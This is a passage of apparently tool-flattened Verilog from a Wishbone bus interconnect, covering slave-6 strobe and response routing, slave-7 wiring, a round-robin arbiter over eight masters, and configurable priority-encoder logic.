    always @ (  ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd6 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd6 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd6 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd6 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd6 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd6 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd6 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd6 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s6_wb_stb_o = ( ( ( m0_slv_sel == 4'd6 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s6_wb_stb_o = ( ( ( m1_slv_sel == 4'd6 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s6_wb_stb_o = ( ( ( m2_slv_sel == 4'd6 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s6_wb_stb_o = ( ( ( m3_slv_sel == 4'd6 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s6_wb_stb_o = ( ( ( m4_slv_sel == 4'd6 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s6_wb_stb_o = ( ( ( m5_slv_sel == 4'd6 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s6_wb_stb_o = ( ( ( m6_slv_sel == 4'd6 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s6_wb_stb_o = ( ( ( m7_slv_sel == 4'd6 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s6_m0_ack_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s6_ack_i );
    assign s6_m1_ack_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s6_ack_i );
    assign s6_m2_ack_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s6_ack_i );
    assign s6_m3_ack_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s6_ack_i );
    assign s6_m4_ack_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s6_ack_i );
    assign s6_m5_ack_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s6_ack_i );
    assign s6_m6_ack_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s6_ack_i );
    assign s6_m7_ack_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s6_ack_i );
    assign s6_m0_err_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s6_err_i );
    assign s6_m1_err_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s6_err_i );
    assign s6_m2_err_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s6_err_i );
    assign s6_m3_err_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s6_err_i );
    assign s6_m4_err_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s6_err_i );
    assign s6_m5_err_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s6_err_i );
    assign s6_m6_err_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s6_err_i );
    assign s6_m7_err_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s6_err_i );
    assign s6_m0_rty_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s6_rty_i );
    assign s6_m1_rty_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s6_rty_i );
    assign s6_m2_rty_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s6_rty_i );
    assign s6_m3_rty_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s6_rty_i );
    assign s6_m4_rty_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s6_rty_i );
    assign s6_m5_rty_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s6_rty_i );
    assign s6_m6_rty_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s6_rty_i );
    assign s6_m7_rty_o = ( ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s6_rty_i );
    assign s7_wb_data_i = s7_data_i;
    assign s7_data_o = s7_wb_data_o;
    assign s7_addr_o = s7_wb_addr_o;
    assign s7_sel_o = s7_wb_sel_o;
    assign s7_we_o = s7_wb_we_o;
    assign s7_cyc_o = s7_wb_cyc_o;
    assign s7_stb_o = s7_wb_stb_o;
    assign s7_wb_ack_i = s7_ack_i;
    assign s7_wb_err_i = s7_err_i;
    assign s7_wb_rty_i = s7_rty_i;
    always @ (  posedge clk_i)
    begin
        s7_next <=  ~( s7_wb_cyc_o);
    end
    assign s7_arb_req = { m7_s7_cyc_o, m6_s7_cyc_o, m5_s7_cyc_o, m4_s7_cyc_o, m3_s7_cyc_o, m2_s7_cyc_o, m1_s7_cyc_o, m0_s7_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s7_arb_state <= s7_arb_grant0;
        end
        else
        begin 
            s7_arb_state <= s7_arb_next_state;
        end
    end
    always @ (  s7_arb_state or  { m7_s7_cyc_o, m6_s7_cyc_o, m5_s7_cyc_o, m4_s7_cyc_o, m3_s7_cyc_o, m2_s7_cyc_o, m1_s7_cyc_o, m0_s7_cyc_o } or  1'b0)
    begin
        s7_arb_next_state = s7_arb_state;
        case ( s7_arb_state ) 
        s7_arb_grant0:
        begin
            if (  !( s7_arb_req[0]) | 1'b0 ) 
            begin
                if ( s7_arb_req[1] ) 
                begin
                    s7_arb_next_state = s7_arb_grant1;
                end
                else
                begin 
                    if ( s7_arb_req[2] ) 
                    begin
                        s7_arb_next_state = s7_arb_grant2;
                    end
                    else
                    begin 
                        if ( s7_arb_req[3] ) 
                        begin
                            s7_arb_next_state = s7_arb_grant3;
                        end
                        else
                        begin 
                            if ( s7_arb_req[4] ) 
                            begin
                                s7_arb_next_state = s7_arb_grant4;
                            end
                            else
                            begin 
                                if ( s7_arb_req[5] ) 
                                begin
                                    s7_arb_next_state = s7_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s7_arb_req[6] ) 
                                    begin
                                        s7_arb_next_state = s7_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s7_arb_req[7] ) 
                                        begin
                                            s7_arb_next_state = s7_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_arb_grant1:
        begin
            if (  !( s7_arb_req[1]) | 1'b0 ) 
            begin
                if ( s7_arb_req[2] ) 
                begin
                    s7_arb_next_state = s7_arb_grant2;
                end
                else
                begin 
                    if ( s7_arb_req[3] ) 
                    begin
                        s7_arb_next_state = s7_arb_grant3;
                    end
                    else
                    begin 
                        if ( s7_arb_req[4] ) 
                        begin
                            s7_arb_next_state = s7_arb_grant4;
                        end
                        else
                        begin 
                            if ( s7_arb_req[5] ) 
                            begin
                                s7_arb_next_state = s7_arb_grant5;
                            end
                            else
                            begin 
                                if ( s7_arb_req[6] ) 
                                begin
                                    s7_arb_next_state = s7_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s7_arb_req[7] ) 
                                    begin
                                        s7_arb_next_state = s7_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s7_arb_req[0] ) 
                                        begin
                                            s7_arb_next_state = s7_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_arb_grant2:
        begin
            if (  !( s7_arb_req[2]) | 1'b0 ) 
            begin
                if ( s7_arb_req[3] ) 
                begin
                    s7_arb_next_state = s7_arb_grant3;
                end
                else
                begin 
                    if ( s7_arb_req[4] ) 
                    begin
                        s7_arb_next_state = s7_arb_grant4;
                    end
                    else
                    begin 
                        if ( s7_arb_req[5] ) 
                        begin
                            s7_arb_next_state = s7_arb_grant5;
                        end
                        else
                        begin 
                            if ( s7_arb_req[6] ) 
                            begin
                                s7_arb_next_state = s7_arb_grant6;
                            end
                            else
                            begin 
                                if ( s7_arb_req[7] ) 
                                begin
                                    s7_arb_next_state = s7_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s7_arb_req[0] ) 
                                    begin
                                        s7_arb_next_state = s7_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s7_arb_req[1] ) 
                                        begin
                                            s7_arb_next_state = s7_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_arb_grant3:
        begin
            if (  !( s7_arb_req[3]) | 1'b0 ) 
            begin
                if ( s7_arb_req[4] ) 
                begin
                    s7_arb_next_state = s7_arb_grant4;
                end
                else
                begin 
                    if ( s7_arb_req[5] ) 
                    begin
                        s7_arb_next_state = s7_arb_grant5;
                    end
                    else
                    begin 
                        if ( s7_arb_req[6] ) 
                        begin
                            s7_arb_next_state = s7_arb_grant6;
                        end
                        else
                        begin 
                            if ( s7_arb_req[7] ) 
                            begin
                                s7_arb_next_state = s7_arb_grant7;
                            end
                            else
                            begin 
                                if ( s7_arb_req[0] ) 
                                begin
                                    s7_arb_next_state = s7_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s7_arb_req[1] ) 
                                    begin
                                        s7_arb_next_state = s7_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s7_arb_req[2] ) 
                                        begin
                                            s7_arb_next_state = s7_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_arb_grant4:
        begin
            if (  !( s7_arb_req[4]) | 1'b0 ) 
            begin
                if ( s7_arb_req[5] ) 
                begin
                    s7_arb_next_state = s7_arb_grant5;
                end
                else
                begin 
                    if ( s7_arb_req[6] ) 
                    begin
                        s7_arb_next_state = s7_arb_grant6;
                    end
                    else
                    begin 
                        if ( s7_arb_req[7] ) 
                        begin
                            s7_arb_next_state = s7_arb_grant7;
                        end
                        else
                        begin 
                            if ( s7_arb_req[0] ) 
                            begin
                                s7_arb_next_state = s7_arb_grant0;
                            end
                            else
                            begin 
                                if ( s7_arb_req[1] ) 
                                begin
                                    s7_arb_next_state = s7_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s7_arb_req[2] ) 
                                    begin
                                        s7_arb_next_state = s7_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s7_arb_req[3] ) 
                                        begin
                                            s7_arb_next_state = s7_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_arb_grant5:
        begin
            if (  !( s7_arb_req[5]) | 1'b0 ) 
            begin
                if ( s7_arb_req[6] ) 
                begin
                    s7_arb_next_state = s7_arb_grant6;
                end
                else
                begin 
                    if ( s7_arb_req[7] ) 
                    begin
                        s7_arb_next_state = s7_arb_grant7;
                    end
                    else
                    begin 
                        if ( s7_arb_req[0] ) 
                        begin
                            s7_arb_next_state = s7_arb_grant0;
                        end
                        else
                        begin 
                            if ( s7_arb_req[1] ) 
                            begin
                                s7_arb_next_state = s7_arb_grant1;
                            end
                            else
                            begin 
                                if ( s7_arb_req[2] ) 
                                begin
                                    s7_arb_next_state = s7_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s7_arb_req[3] ) 
                                    begin
                                        s7_arb_next_state = s7_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s7_arb_req[4] ) 
                                        begin
                                            s7_arb_next_state = s7_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_arb_grant6:
        begin
            if (  !( s7_arb_req[6]) | 1'b0 ) 
            begin
                if ( s7_arb_req[7] ) 
                begin
                    s7_arb_next_state = s7_arb_grant7;
                end
                else
                begin 
                    if ( s7_arb_req[0] ) 
                    begin
                        s7_arb_next_state = s7_arb_grant0;
                    end
                    else
                    begin 
                        if ( s7_arb_req[1] ) 
                        begin
                            s7_arb_next_state = s7_arb_grant1;
                        end
                        else
                        begin 
                            if ( s7_arb_req[2] ) 
                            begin
                                s7_arb_next_state = s7_arb_grant2;
                            end
                            else
                            begin 
                                if ( s7_arb_req[3] ) 
                                begin
                                    s7_arb_next_state = s7_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s7_arb_req[4] ) 
                                    begin
                                        s7_arb_next_state = s7_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s7_arb_req[5] ) 
                                        begin
                                            s7_arb_next_state = s7_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_arb_grant7:
        begin
            if (  !( s7_arb_req[7]) | 1'b0 ) 
            begin
                if ( s7_arb_req[0] ) 
                begin
                    s7_arb_next_state = s7_arb_grant0;
                end
                else
                begin 
                    if ( s7_arb_req[1] ) 
                    begin
                        s7_arb_next_state = s7_arb_grant1;
                    end
                    else
                    begin 
                        if ( s7_arb_req[2] ) 
                        begin
                            s7_arb_next_state = s7_arb_grant2;
                        end
                        else
                        begin 
                            if ( s7_arb_req[3] ) 
                            begin
                                s7_arb_next_state = s7_arb_grant3;
                            end
                            else
                            begin 
                                if ( s7_arb_req[4] ) 
                                begin
                                    s7_arb_next_state = s7_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s7_arb_req[5] ) 
                                    begin
                                        s7_arb_next_state = s7_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s7_arb_req[6] ) 
                                        begin
                                            s7_arb_next_state = s7_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s7_msel_req = { m7_s7_cyc_o, m6_s7_cyc_o, m5_s7_cyc_o, m4_s7_cyc_o, m3_s7_cyc_o, m2_s7_cyc_o, m1_s7_cyc_o, m0_s7_cyc_o };
    assign s7_msel_pri_enc_valid = { m7_s7_cyc_o, m6_s7_cyc_o, m5_s7_cyc_o, m4_s7_cyc_o, m3_s7_cyc_o, m2_s7_cyc_o, m1_s7_cyc_o, m0_s7_cyc_o };
    always @ (  s7_msel_pri_enc_valid[0] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[0]) ) 
        begin
            s7_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) } == 2'h1 ) 
                begin
                    s7_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) } == 2'h2 ) 
                    begin
                        s7_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s7_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[0] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[0]) ) 
        begin
            s7_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s7_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[1] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[1]) ) 
        begin
            s7_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) } == 2'h1 ) 
                begin
                    s7_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) } == 2'h2 ) 
                    begin
                        s7_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s7_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[1] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[1]) ) 
        begin
            s7_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s7_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[2] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[2]) ) 
        begin
            s7_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) } == 2'h1 ) 
                begin
                    s7_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) } == 2'h2 ) 
                    begin
                        s7_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s7_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[2] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[2]) ) 
        begin
            s7_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s7_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[3] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[3]) ) 
        begin
            s7_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
